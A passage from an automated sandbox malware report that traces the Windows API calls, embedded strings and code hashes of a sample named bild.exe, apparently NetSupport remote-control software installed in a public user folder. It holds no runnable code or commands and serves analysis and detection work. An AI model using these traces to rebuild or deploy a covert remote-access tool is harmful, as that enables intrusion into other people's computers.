                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpen
                                                                                          • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                          • API String ID: 47109696-3245241687
                                                                                          • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                          • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                          • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                          • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                          APIs
                                                                                            • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                            • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                            • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                          • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                          • API String ID: 806825551-1858614750
                                                                                          • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                          • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                          • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                          • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                          APIs
                                                                                            • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                            • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                          • ResetEvent.KERNEL32(00000260), ref: 11144269
                                                                                          • SetEvent.KERNEL32(00000260), ref: 1114427F
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                          • String ID: MiniDump
                                                                                          • API String ID: 1494854734-2840755058
                                                                                          • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                          • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                          • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                          • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                          APIs
                                                                                            • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
                                                                                            • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
                                                                                            • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                          • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                          • API String ID: 3215810784-3459472706
                                                                                          • Opcode ID: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
                                                                                          • Instruction ID: 4573ae2351151d015c2c357bba2021c5f544f90380badc6162b9e0d8fb36d264
                                                                                          • Opcode Fuzzy Hash: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
                                                                                          • Instruction Fuzzy Hash: 6111E471A04316DFDF109B599C41BEA7374EB45306F010466DE19E7A40EB70BE48CFAA
                                                                                          APIs
                                                                                          • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                          • wsprintfA.USER32 ref: 11146E06
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                          • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                          • API String ID: 1985783259-2296142801
                                                                                          • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                          • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                          • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                          • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                            • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                            • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                          • wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • _memset.LIBCMT ref: 1110F477
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                          • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                          • API String ID: 3234921582-2664294811
                                                                                          • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                          • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                          • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                          • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                          APIs
                                                                                            • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                            • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                            • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                            • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                          • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                          • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                          • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                          • API String ID: 1108920153-1959555903
                                                                                          • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                          • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                          • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                          • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 11031926
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                          • String ID: %s%s.bin$506407$clientinv.cpp$m_pDoInv == NULL
                                                                                          • API String ID: 4180936305-764941068
                                                                                          • Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                          • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                          • Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
                                                                                          • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                          • __strdup.LIBCMT ref: 111446A7
                                                                                            • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                            • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                          • _free.LIBCMT ref: 111446DC
                                                                                            • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                            • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                          • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 398584587-0
                                                                                          • Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                          • Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
                                                                                          • Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
                                                                                          • Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
                                                                                          APIs
                                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                            • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                          • _free.LIBCMT ref: 1100EDB4
                                                                                            • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                            • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                          • _free.LIBCMT ref: 1100EDC7
                                                                                          • _free.LIBCMT ref: 1100EDDA
                                                                                          • _free.LIBCMT ref: 1100EDED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                          • String ID:
                                                                                          • API String ID: 3515823920-0
                                                                                          • Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                          • Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
                                                                                          • Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
                                                                                          • Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
                                                                                          APIs
                                                                                            • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                            • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                            • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                          • wsprintfA.USER32 ref: 1114593E
                                                                                          • wsprintfA.USER32 ref: 11145954
                                                                                            • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75A78400,?), ref: 111432C7
                                                                                            • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                            • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
